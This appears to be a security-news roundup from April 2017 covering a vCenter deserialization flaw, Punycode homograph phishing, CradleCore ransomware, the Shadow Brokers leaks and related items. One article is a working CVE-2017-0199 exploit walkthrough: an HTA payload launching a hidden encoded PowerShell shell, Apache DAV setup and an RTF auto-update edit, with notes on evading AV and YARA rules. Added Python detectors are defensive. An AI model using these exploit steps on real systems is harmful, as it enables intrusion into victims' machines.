VMware has released patches for its vCenter Server product to address a critical remote code execution flaw that exists due to the use of a vulnerable third-party component.
Earlier this month, CERT/CC informed users that Markus Wulftange, senior penetration tester at Code White, had identified three potentially serious deserialization-related flaws in several Java implementations of AMF3, the latest version of Adobe’s Action Message Format.
The vulnerabilities can be exploited for denial-of-service (DoS) attacks, remote code execution and to obtain sensitive data. The affected software includes Apache’s Flex BlazeDS, Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.
One of the BlazeDS vulnerabilities, tracked as CVE-2017-5641, has been found to affect VMware vCenter Server, which uses BlazeDS to process AMF3 messages.
“The issue is present in the Customer Experience Improvement Program (CEIP) functionality. If a customer has opted out of CEIP the vulnerability is still present. Also opting out will not remove the vulnerability,” VMware said in its advisory.
The security hole affects vCenter Server 6.0 and 6.5; version 5.5 and other VMware products are not impacted. VMware has advised users to apply the 6.5c and 6.0U3b patches to address the vulnerability.
According to CERT/CC, the deserialization vulnerabilities identified by Wulftange could also affect products from HPE and SonicWall.
This Phishing Attack is Almost Impossible to Detect On Chrome, Firefox and Opera
18.4.2017 thehackernews Phishing
A Chinese infosec researcher has discovered a new "almost impossible to detect" phishing attack that can be used to trick even the most careful users on the Internet.
He warned that hackers can use a known weakness in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon, in order to steal login or financial credentials and other sensitive information from users.
What is the best defence against a phishing attack? Generally, checking the address bar after the page has loaded and confirming that it is being served over a valid HTTPS connection. Right?
Okay, then before going into the in-depth details, first have a look at this demo web page (note: you may experience downtime due to high traffic on the demo server), set up by Chinese security researcher Xudong Zheng, who discovered the attack.
“It becomes impossible to identify the site as fraudulent without carefully inspecting the site's URL or SSL certificate.” Xudong Zheng said in a blog post.
If your web browser is displaying "apple.com" in the address bar secured with SSL, but the content on the page is coming from another server (as shown in the above picture), then your browser is vulnerable to the homograph attack.
There is another proof-of-concept website, created by security experts from Wordfence, that demonstrates this browser vulnerability. It spoofs the "epic.com" domain.
The homograph attack has been known since 2001, but browser vendors have struggled to fix the problem. It’s a kind of spoofing attack where a website address looks legitimate but is not, because one or more characters have been deceptively replaced with Unicode characters.
No matter how aware you are, anyone can fall victim to this "Almost Impossible to Detect" phishing attack.
Many Unicode characters, which represent alphabets like Greek, Cyrillic, and Armenian in internationalised domain names, look the same as Latin letters to the casual eye but are treated by computers as completely different web addresses.
For example, the Cyrillic "а" (U+0430) and the Latin "a" (U+0041) are treated differently by browsers, but both are displayed as "a" in the browser address bar.
Punycode Phishing Attacks
By default, many web browsers use ‘Punycode’ encoding to represent Unicode characters in the URL in order to defend against homograph phishing attacks. Punycode is a special encoding used by the web browser to convert Unicode characters to the limited ASCII character set (A-Z, 0-9) supported by the International Domain Names (IDN) system.
For example, the Chinese domain "短.co" is represented in Punycode as "xn--s7y.co".
According to Zheng, the vulnerability relies on the fact that web browsers render Punycode URLs as Unicode only when the characters come from a single language (for example only Chinese or only Japanese), and they fail when a domain name contains characters from multiple languages.
This loophole allowed the researcher to register the domain name xn--80ak6aa92e.com and bypass the protection; the domain appears as “apple.com” in all vulnerable web browsers, including Chrome, Firefox, and Opera, while Internet Explorer, Microsoft Edge, Apple Safari, Brave, and Vivaldi are not vulnerable.
Here, the xn-- prefix is known as the ‘ASCII compatible encoding’ prefix, which tells the web browser that the domain uses Punycode to represent Unicode characters. Because Zheng used the Cyrillic "а" (U+0430) rather than the ASCII "a" (U+0041), the defence implemented by the web browsers fails.
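The Punycode decoding and the lookalike problem described above, as an added example (written for this page, not code from Zheng's post or from the article): it decodes an ACE (xn--) hostname with Python's built-in idna codec, flags labels that mix scripts, and separately flags labels that are non-ASCII but consist entirely of Cyrillic letters visually confusable with Latin ones. The second check is the one that matters for Zheng's domain, because that label is pure Cyrillic and so passes a mixed-script test. The confusables table is a constructed subset for illustration, not the full Unicode confusables list.

```python
import unicodedata

# Constructed lookalike table: Cyrillic letters whose glyphs are visually
# confusable with Latin letters. Illustrative subset, not the full Unicode
# confusables data (UTS #39).
CYRILLIC_TO_LATIN = {
    "\u0430": "a",  # а
    "\u0435": "e",  # е
    "\u043e": "o",  # о
    "\u0440": "p",  # р
    "\u0441": "c",  # с
    "\u0443": "y",  # у
    "\u0445": "x",  # х
    "\u04cf": "l",  # ӏ (palochka)
    "\u0456": "i",  # і
    "\u0458": "j",  # ј
    "\u0455": "s",  # ѕ
}


def decode_idn(hostname: str) -> str:
    """Turn an ACE hostname such as xn--s7y.co into its Unicode form."""
    return hostname.encode("ascii").decode("idna")


def script_of(ch: str) -> str:
    """Coarse script classification derived from the Unicode character name."""
    name = unicodedata.name(ch, "")
    for script in ("CYRILLIC", "GREEK", "ARMENIAN", "LATIN"):
        if name.startswith(script):
            return script
    return "OTHER"


def skeleton(label: str) -> str:
    """Replace each known Cyrillic lookalike with the Latin letter it imitates."""
    return "".join(CYRILLIC_TO_LATIN.get(ch, ch) for ch in label)


def has_mixed_scripts(label: str) -> bool:
    """True when letters from more than one of the tracked scripts appear."""
    scripts = {script_of(ch) for ch in label if ch.isalpha()}
    scripts.discard("OTHER")
    return len(scripts) > 1


def is_lookalike_label(label: str) -> bool:
    """True when a non-ASCII label is built entirely from Latin lookalikes."""
    if label.isascii():
        return False
    return skeleton(label).isascii()


def classify(hostname: str) -> dict:
    """Decode if needed, then report both homograph indicators per label."""
    unicode_host = decode_idn(hostname) if hostname.isascii() else hostname
    labels = unicode_host.split(".")
    return {
        "unicode": unicode_host,
        "mixed_script": any(has_mixed_scripts(lbl) for lbl in labels),
        "lookalike": any(is_lookalike_label(lbl) for lbl in labels),
    }


if __name__ == "__main__":
    for host in ("xn--80ak6aa92e.com", "apple.com", "\u0430pple.com", "\u77ed.co"):
        print(host, classify(host))
```

A browser-side defence along these lines shows the Punycode form whenever `lookalike` is true, and leaves a genuinely single-script domain such as 短.co rendered as Unicode, which is the behaviour the Chrome fix described below aims for.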
Zheng has reported this issue to the affected browser vendors, including Google and Mozilla in January.
Fake Page (top) and Original Apple.com (bottom), but exactly same URL
While Mozilla is still discussing a fix, Google has already patched the vulnerability in its experimental Chrome Canary 59 and will ship a permanent fix with the release of Chrome Stable 58, set to launch later this month.
Meanwhile, the millions of Internet users at risk from this sophisticated, hard-to-detect phishing attack are advised to disable Punycode support in their web browsers to temporarily mitigate the attack and identify such phishing domains.
Mitigation For Firefox Users (No Fix For Chrome)
Firefox users can follow the steps below to manually apply a temporary mitigation:
Type about:config in the address bar and press Enter.
Type Punycode in the search bar.
The browser settings will show a parameter titled network.IDN_show_punycode; double-click it, or right-click and select Toggle, to change the value from false to true.
Unfortunately, there is no similar setting in Chrome or Opera to disable Punycode URL conversion manually, so Chrome users have to wait a few weeks for the patched Stable 58 release.
Internet users are always advised to manually type website URLs into the address bar for important sites like Gmail, Facebook, Twitter, Yahoo or banking websites, instead of clicking a link on some website or in an email, to protect against such hard-to-detect attacks.
Who is offering the CradleCore Ransomware as source code?
18.4.2017 securityaffairs Ransomware
CradleCore is a ransomware that is offered in the underground as source code, instead of under the classic ransomware-as-a-service (RaaS) model.
According to experts at Forcepoint, the author is offering the malware on several Tor-based crime forums as source code, allowing crooks to request a customized version of the code.
The CradleCore ransomware is offered by the author as C++ source code along with the necessary PHP web server scripts and a payment panel. The malware goes for 0.35 Bitcoin (around $400), but the price is negotiable.
“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then will the developers consider selling the source code.” reads the analysis published by Forcepoint.
“CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”
According to the experts, this sales model will lead to the development of new variants derived from CradleCore.
The ransomware is offered with a relatively complete feature set: it uses Blowfish for file encryption and also allows offline encryption.
The malicious code implements an anti-sandbox mechanism and communicates with its command and control server via a Tor2Web gateway.
Once it has infected a system, the CradleCore ransomware encrypts files, appending the .cradle extension to them, and drops a ransom note on the system.
Experts from Forcepoint who analyzed the readme file believe that the author of the malware is a developer without significant experience in malware coding.
The researchers discovered more about the author by conducting further analysis on the advertisement site for CradleCore ransomware.
“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.
“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.
Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”
Of course, this only means that the owner of the clearnet site used to sell the ransomware is linked to a freelance C++ developer; there is no proof that he is also the coder.
In conclusion, Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.
“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.
Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC)
18.4.2017 securityaffairs Exploit
The security expert David Routin (@Rewt_1) has detailed a step-by-step procedure to exploit the recently patched CVE-2017-0199 vulnerability, which has been exploited in Windows attacks in the wild.
Introduction
For several days the security community has been informed, thanks to a FireEye publication, of different malware campaigns (Dridex…) leveraging CVE-2017-0199.
Several other publications covered this vulnerability, but no working exploit was published.
After digging for a while I found a way to exploit this vulnerability easily, which seems to be a bit different from the work already done by other researchers.
I decided to publish this work as Microsoft officially published a patch on 11 April 2017.
Technical background
It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link each time the document is loaded.
What is amazing is that if you try to include an HTA link as an OLEv2 object it will be executed once (at creation), but WinWord will return an error like:
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have had to link it with a file and create an icon, but we want to be stealthy and have autorun, right?)
After thinking for a while I started to consider how to handle a real, non-malicious OLE object link to a remote RTF file. To achieve this I had to play a little with the Content-Type and the DAV module in Apache to serve my file in the “proper” way expected by Microsoft Office (this will be discussed in the next chapters).
From there, I have a valid embedded object link that is automatically updated each time my document is opened!
Next step? Modify the document at the source with my payload in HTA!
In this scenario, I was able to:
– Create a dynamic OLEv2 object link for a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated if I wanted to create a direct link to HTA document
Another issue: the OLE object needed to be activated automatically!
I had much help in solving all these issues from the different articles in the references section. Thanks to Didier Stevens’ blog, Vincent Yiu (whose article was my main inspiration), NVISO Labs, FireEye and obviously… Microsoft 🙂
Step 1
Prepare an HTA file (HTA files are HTML Applications, which can run JScript and VBScript).
Let’s call it “ms.hta”
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2
Create a simple RTF document using WinWord with any random content (in our example the string “This is my official and legit content”).
Call it “ms.rtf”
Step 3
Push these two files to a web server you have full control of.
We assume they will be stored in /var/www/html.
Now we have to configure Apache to be able to include ms.rtf as a link:
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
The following directives will:
– add the Content-Type application/rtf to all files in /ms
– allow the PROPFIND request performed by Microsoft Office
Modify the virtual host and include:
<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
service apache2 restart
Step 4
Create a simple RTF document “exploit.rtf” using WinWord. This will be our exploit!
Insert -> Object
CVE-2017-0199 Creation of OLEv2 external link
After clicking OK you will get the content of the “ms.rtf” file, which just contains a random string.
Save the file as “exploit.rtf”
CVE-2017-0199 Olev2 link object created
At this step we can close WinWord and go to the next step: changing the content of ms.rtf to the HTA payload.
Step 5
The following step will:
– replace the ms.rtf that we have linked with the custom HTA payload
– make the web server send an “application/hta” Content-Type; this will be interpreted by the WinWord client, which will run mshta to handle this content type and execute our payload
cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf
vi /etc/apache2/sites-enabled/000-default
Change application/rtf to application/hta, like:
<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>
service apache2 restart
Step 6
At this step, if the user opens the “exploit.rtf” file he will have to double-click the link object to launch the attack…
If we want the OLE object to be loaded automatically when the document is opened, we have to edit the exploit.rtf file and change:
to
\object\objautlink\objupdate\rsltpict……………………..
At this step the exploit is built.
Exploitation:
Once the user opens the document, the OLE object is updated through the link and mshta is executed thanks to the application/hta Content-Type delivered by the server.
Result: code is executed!
Meterpreter is here!
We don’t care about the warning as the code was already executed…
CVE-2017-0199 Exploited ! warning after execution
Detection using current AV/published YARA rules
From my personal tests it seems that this method is not currently caught by AV (Defender already has a signature for CVE-2017-0199).
Additionally, the currently published YARA rules do not match this exploit:
rule rtf_objdata_urlmoniker_http {
strings:
$header = "{\\rtf1"
$objdata = "objdata 0105000002000000" nocase
$urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
$http = "68007400740070003a002f002f00" nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}
Indeed, the urlmoniker string is not present in this document, so this YARA rule will never trigger on it.
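Because the published rule keys on the URL moniker CLSID that this variant never embeds, a detector for this technique has to look at the RTF control words the write-up itself uses: \object, \objautlink and \objupdate, which together describe a linked object that refreshes its content as soon as the document is opened. The following is an added example (written for this page, not Routin's code or a tool from the referenced articles) that tokenises an RTF blob and reports whether it carries such an auto-updating link. Both sample documents are constructed inline; the objdata hex is a placeholder rather than a real OLE stream.

```python
import re

# RTF control words the write-up relies on: \object opens an embedded or
# linked object, \objautlink marks it as an automatically updating link,
# \objupdate forces the update when the document opens, and \objdata carries
# the hex-encoded OLE blob that the published YARA rule inspects.
CONTROL_WORD = re.compile(rb"\\([a-zA-Z]+)")
LINK_INDICATORS = {"objautlink", "objupdate"}

# Constructed sample: a minimal RTF carrying an auto-updating linked object.
# The objdata hex is a placeholder and not a real OLE stream.
SAMPLE_AUTOLINK_RTF = (
    b"{\\rtf1\\ansi\\deff0 This is my official and legit content "
    b"{\\object\\objautlink\\objupdate\\rsltpict\\objw3000\\objh1200"
    b"{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata 01050000020000000b000000}"
    b"{\\result{\\pict\\wmetafile8 00}}}}"
)

# Constructed benign sample: plain text, no object at all.
SAMPLE_PLAIN_RTF = b"{\\rtf1\\ansi\\deff0 This is my official and legit content}"


def rtf_control_words(data: bytes) -> set:
    """Return the set of RTF control words present in the document."""
    return {m.group(1).decode("ascii") for m in CONTROL_WORD.finditer(data)}


def assess_rtf(data: bytes) -> dict:
    """Classify an RTF blob by the OLE link indicators it carries."""
    is_rtf = data.startswith(b"{\\rtf")
    words = rtf_control_words(data) if is_rtf else set()
    has_object = "object" in words
    # Both control words must accompany \object for the link to fire on open.
    auto_update_link = has_object and LINK_INDICATORS <= words
    if not is_rtf:
        verdict = "not an RTF document"
    elif auto_update_link:
        verdict = "auto-updating OLE link: fetches remote content on open"
    elif has_object:
        verdict = "embedded or linked object that needs user activation"
    else:
        verdict = "no OLE object"
    return {
        "is_rtf": is_rtf,
        "has_object": has_object,
        "auto_update_link": auto_update_link,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, blob in (("autolink", SAMPLE_AUTOLINK_RTF), ("plain", SAMPLE_PLAIN_RTF)):
        print(name, assess_rtf(blob))
```

Linked objects that auto-update do occur in legitimate documents, so a mail gateway would treat this verdict as a reason to strip or detonate the attachment rather than as proof of exploitation; combining it with the Content-Type actually returned by the linked server closes the gap the write-up describes.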
References
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
Cybercriminals Steal Card Data From Shoney's Restaurants
18.4.2017 securityweek Incident
Cybercriminals managed to steal payment card data from nearly 40 Shoney’s restaurants after planting malware on their point-of-sale (PoS) systems.
Security blogger Brian Krebs learned from his sources in the financial industry that a fraud pattern had been spotted on cards used at locations of the Nashville, Tennessee-based restaurant chain. Shortly after Krebs published a blog post on Friday, Best American Hospitality Corp. confirmed that some of the Shoney's corporate affiliated restaurants it manages and operates had been hit by a data breach.
The company hired Kroll Cyber Security to investigate the incident. The security firm determined that hackers had remotely installed malware on payment processing systems at tens of Shoney’s restaurants.
The malware was designed to steal data such as cardholder name, card number, expiration date and internal verification code as it was being routed through the infected device. Investigators determined that in some cases the malware may not have obtained cardholder names.
Kroll’s investigation showed that some of the impacted locations were breached on December 27, 2016, while others were first compromised on January 11. Best American Hospitality is confident that the breach was contained by March 6.
As of last year, there were roughly 150 company-owned and franchised Shoney's restaurants across 17 U.S. states. Best American Hospitality said the breach affected 37 locations in South Carolina, Tennessee, Louisiana, Alabama, Georgia, Mississippi, Virginia, Missouri, Florida and Arkansas.
Several other major restaurant chains reported suffering data breaches in the past months, including CiCi’s, Arby’s, Wendy’s and Noodles & Company.
IHG warns of card-stealing malware at front desks
In addition to restaurants, several major hotel chains also reported being hit by card-stealing malware. One of them is InterContinental Hotels Group (IHG), which in early February confirmed that systems processing payments for bars and restaurants at 12 of the properties it manages had been compromised.
Now, IHG has informed customers that it has identified malware which may have stolen data from cards used at hotel front desks. The malware is believed to have stolen data between September 29 and December 29, 2016, but the company only received confirmation that the threat had been neutralized in February and March, when the affected properties were investigated.
CradleCore Ransomware Sold as Source Code
18.4.2017 securityweek Ransomware
The author of a new piece of ransomware is selling their creation on underground forums as source code, Forcepoint security researchers have discovered.
Dubbed CradleCore, the threat breaks from the ransomware-as-a-service (RaaS) business model that many miscreants have adopted lately, and allows “customers” to take advantage of customizable source code.
The ransomware is provided as a C++ source code, paired with the necessary PHP web server scripts and a payment panel. According to Forcepoint, the malware emerged on several Tor-based sites some two weeks ago, priced at 0.35 Bitcoin (around $400) but negotiable.
Because the ransomware’s source code is sold directly, the security company expects an increase in the number of variants stemming from CradleCore.
Upon analysis, the security researchers discovered that the malware comes with “a relatively complete feature set,” as it uses Blowfish for file encryption, features anti-sandbox defenses, supports offline encryption, and uses a Tor2Web gateway (onion.link) to communicate with its command and control (C&C) server.
After infecting a system, the ransomware proceeds to encrypt user’s files and to append the .cradle extension to them. When the encryption has been completed, the malware drops a ransom note.
According to Forcepoint, some of the words used in the readme file suggest that CradleCore’s author is not a professional malware developer, but a software developer who decided to take a shot at the ransomware scene.
After tracking the advertisement site for CradleCore to a clearnet site and a Linode-assigned IP address, the security researchers concluded that the author might indeed be a freelance software developer. Information on the developer’s personal website led to the author’s Twitter and LinkedIn accounts, which revealed that he is a C++ programmer.
However, all that Forcepoint can do at the moment is to “link the clearnet site with a freelance C++ developer and with an Onion site offering the CradleCore C++ source code for sale.” Thus, while they can provide a link between the owner of the clearnet site and the malware, they can’t attribute the ransomware to said developer, at least not “without knowledge of whether or not the Linode host itself has been compromised.”
“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.
Microsoft: Latest 'Shadow Brokers' Exploits Already Patched
18.4.2017 securityweek Exploit
The hacker group calling itself “Shadow Brokers” has made public another batch of files allegedly obtained from the NSA-linked threat actor tracked as the Equation Group. Microsoft has assured customers that these new exploits don’t affect up-to-date systems.
The Shadow Brokers recently published a password to a previously leaked file and many believed it would represent the group’s last dump. However, the hackers released another round of files on Friday, including exploits for Windows and IBM’s Lotus Domino platform. The leaked files also appear to show that the Equation Group breached the SWIFT banking network and monitored a number of Middle Eastern banks.
Microsoft has analyzed the latest dump and identified a dozen exploits targeting its Windows operating system. According to the company, some of the vulnerabilities leveraged by these exploits were patched back in 2008, 2009, 2010 and 2014.
Four of the exploits, dubbed EternalBlue, EternalChampion, EternalRomance and EternalSynergy, were addressed by Microsoft with the March 2017 security updates — a majority with the MS17-010 patch. The tech giant also pointed out that the remaining exploits do not work on Windows 7 and later, or Exchange 2010 and later.
Microsoft has not shared any information on how it learned about the vulnerabilities. However, experts believe the NSA itself may have disclosed the flaws to the company.
The Shadow Brokers published the names of the exploits leaked on Friday back in January, when they announced an auction for Windows tools. After seeing the list published in January, the NSA may have decided to alert Microsoft knowing that the exploits would likely be made public at some point.
Edward Snowden ✔ @Snowden
Microsoft doesn't credit anyone for the report behind the March patch. Was it @NSAGov? If so, it was the right call. Better late than never. https://twitter.com/botherder/status/853153945677684736 …
2:13 PM - 15 Apr 2017
It’s also worth noting that Microsoft postponed its February 2017 security updates due to an unspecified “last minute issue,” and the March patches contained fixes for several of the Equation Group exploits.
While there has been a lot of speculation as to who might be behind the Shadow Brokers — some say Russia, while others believe it could be an NSA contractor — the hackers continue to claim that their main goal is to make money. They’ve had several sales strategies, including auctions and crowdfunding, but the Bitcoin address they have provided received only 10 bitcoins.
In a brief statement they published on Friday, the hackers suggested that more files could be released this week.
Regular vulnerability reporting is changing: Microsoft has scrapped the bulletins
18.4.2017 SecurityWorld Security
For decades Microsoft published regular security bulletins: reports on the patches and updates for bugs and vulnerabilities. It was a convenient system for users and above all for IT administrators responsible for securing the network and keeping a company's information technology running.
The company now uses a different form of monthly reporting, but users are not satisfied.
"It's like learning to walk, run and ride a bike again, all at once," says Chris Goettl, product manager at Ivanti.
Microsoft had been talking about discontinuing the bulletins for months, and once even called off their cancellation midway; now it looks like the end is final.
The bulletins are replaced by a searchable database of documents accessible through the Security Updates Guide (SUG) portal. The contents of the database can be sorted and filtered by specific software, by the release date of the update, by the CVE identifier of the vulnerability, by the numeric or KB designation of the update, or by the supporting "knowledge base" document.
SUG's predecessors were the popular security bulletins, which had existed since at least 1998. Microsoft took such care with them that many regarded them as the bar software developers should aim for.
During yesterday's updates, which among other things fixed a critical zero-day vulnerability in Word, the bulletins no longer appeared.
Goettl, who waited until the final cancellation of the bulletins to assess the new system, is not at all enthusiastic about SUG.
Earlier he was reluctant to judge SUG, but saw "great potential" in it. Today, however, he is not sure whether SUG can deliver the same quantity and quality of information as the bulletins without needlessly burdening IT administrators.
"I wasn't sure about it, but I hoped we would get the same details," he said of SUG.
Although most of the earlier documents and information from the bulletins remain available in SUG, the problem is the accessibility of these online documents.
"This month Microsoft resolved 46 vulnerabilities," Goettl explains. "It took me four hours to find that out using SUG. Last month 136 vulnerabilities were resolved and it took me two hours to find that out using the bulletins. So with the bulletins I did three times the work in half the time."
Not a flattering picture.
Goettl blames Microsoft for needlessly creating extra work for administrators and making it harder for them to access information. Because the database is built around CVEs, the unique identifiers of each vulnerability, Goettl had to open a large number of pages in his browser to get at the detailed information.
"Previously you simply visited the bulletin, say for Windows 10, and the resolved vulnerabilities and the related KB pages were listed there, all in one place," he explains. "But this month, for 26 resolved vulnerabilities, I had to open 26 web pages. One for each individual vulnerability."
"That was a slight disappointment for me."
Above all, Goettl does not understand Microsoft's reasons. "I don't know what sense it makes for the company to cancel the bulletins," he says. Goettl hosted a free webinar on the security updates, a common practice at Ivanti, and many participants shared his astonishment.
"Nobody understood why Microsoft is trying to make finding information harder."
For now Goettl hopes that Microsoft will listen to customers and make changes to SUG. "More work is needed. It can't end like this," he believes.
Meanwhile Ivanti has created what Goettl calls "artificial bulletins," which deliver the information from SUG to customers using the Shavlik patch management system. Goettl confirmed that similar older systems under Ivanti will receive the same kind of information.
The failure of the missile launch by North Korea may have been caused by US cyber attack
17.4.2017 securityaffairs CyberWar
The failed missile launch by North Korea may have been caused by a cyber attack powered by the US Cyber Command.
The crisis between the US and North Korea is escalating; Donald Trump warns his military may ‘have no choice’ but to strike the rogue state.
According to The Sun, US cyber soldiers may have hacked the control system of the rocket, causing the failure of the launch.
The nuclear test ballistic missile exploded within five seconds of the launch; according to the newspaper, US agents used stealthy malware that caused a massive malfunction.
The launch took place near the port city of Sinpo; Kim Jong-un ordered it in defiance of President Trump, who had sent a naval task force to the region.
The US naval force in the area, led by the aircraft carrier USS Carl Vinson, is equipped with rockets capable of intercepting missiles, but they were not deployed.
It was a medium-range ballistic rocket, likely a Nodong. Experts highlighted that North Korea is forced to import the high-tech electronics used in its missiles, so it is likely that US hackers compromised the supply chain, implanting undetectable malware.
According to some experts, North Korea is vulnerable to cyber attacks because its scientists have to import electronic hardware.
The experts believe that US cyber units may have detected the launch and sent the instructions to the malware via satellite from the US National Security Agency headquarters in Maryland.
Source: The Sun
Fantasy or reality?
Such an attack requires a huge effort in terms of HUMINT and technical activities, but it is perfectly feasible.
“It is perfectly feasible the US brought down this missile.” said Defence analyst Paul Beaver.
“Their cyber warfare capabilities are now highly advanced.
“As soon as military satellites watching Sinpo detected an imminent launch, a team at the National Security Agency would have got to work.”
“It’s possible for them to have sent a signal directly to the missile from Maryland which effectively zapped it out of the sky.”
“North Korea has had a string of launch failures and it may be no coincidence that they have happened as the US went to cyber war.”
President Trump did not comment on the failure of Kim's missile.
Analysts believe that Kim will punish military commanders involved in the failed operation.
Kim has a history of punishing failure with terrible retribution, including executing his own officials with anti-aircraft guns.
Looking at North Korea's military programme, we can see a long series of technical failures; part of the intelligence community attributes these incidents to cyber attacks conducted by US Cyber Command.
Other ballistic tests failed in recent weeks, with medium-range North Korean rockets crashing and exploding.
“Last year a Musudan missile fired to mark the anniversary of the birth of Kim’s grandfather Kim Il-sung blew up so soon after take-off it wrecked its launcher.” reported The Sun.
“In November 2015 an attempt to launch a ballistic missile from a submarine ended in failure when the weapon disintegrated underwater.”
“There are many things that can go wrong but it would be impossible to tell from outside if something had affected the internal guidance or control systems.” said Defence analyst Lance Gatling.
“It has been openly mentioned that there is a possibility that the North’s supply chain for components has been deliberately infected, and they might never know.”
Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers
Microsoft published its biannual transparency report: the number of US foreign intelligence surveillance requests more than doubled.
Microsoft shared the data included in its biannual transparency report: the IT giant received more than double the number of requests under the Foreign Intelligence Surveillance Act (FISA) that it had reported for the preceding six months.
Microsoft Corp announced that in the first half of 2016 it received at least a thousand surveillance requests from the US Government seeking user content for foreign intelligence purposes.
This is the highest number of requests Microsoft has listed since 2011, when it began tracking such government surveillance orders.
Privacy advocates in Congress are concerned about the increase and are calling for reforms to FISA legislation that would limit the US Government's ability to search data on Americans that is incidentally collected during foreign surveillance operations.
FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.
“Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015.” reported Reuters.
The Microsoft biannual transparency report consists of the Law Enforcement Requests Report, the U.S. National Security Orders Report and the Content Removal Requests Report.
“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”
Microsoft biannual transparency report
A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.
Microsoft also published for the first time a national security letter (NSL), a type of warrantless surveillance order used by the FBI to access a customer's data.
“As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services.” states Microsoft.
Microsoft isn't the only company to have disclosed an NSL; Twitter and Yahoo did the same in recent months under a transparency measure of the USA Freedom Act.
Terror EK rising in the threat landscape while Sundown EK drops
17.4.2017 securityaffairs Exploit
The Sundown EK has been inactive since early this year, while the Terror EK is becoming very popular in the cybercriminal ecosystem.
One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.
What’s happening now?
The Sundown EK has been inactive since early this year, while the Terror EK is becoming very popular in the cybercriminal ecosystem.
Last week, Cisco Talos published an analysis of Sundown EK; the experts detailed improvements to the kit, which showed many similarities with the RIG exploit kit.
“Sundown is an exploit kit in transition, it has stopped using calling cards and other easily ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors.” reads the analysis of the Talos group. “The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web.”
The Sundown EK was not as sophisticated as other large exploit kits.
Security experts at Talos noticed a long period of inactivity of the Sundown EK; variants of the kit, including Bizarro and Greenflash, also disappeared from the scene.
This silence led the experts to believe that the threat actor had ceased operations.
“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.
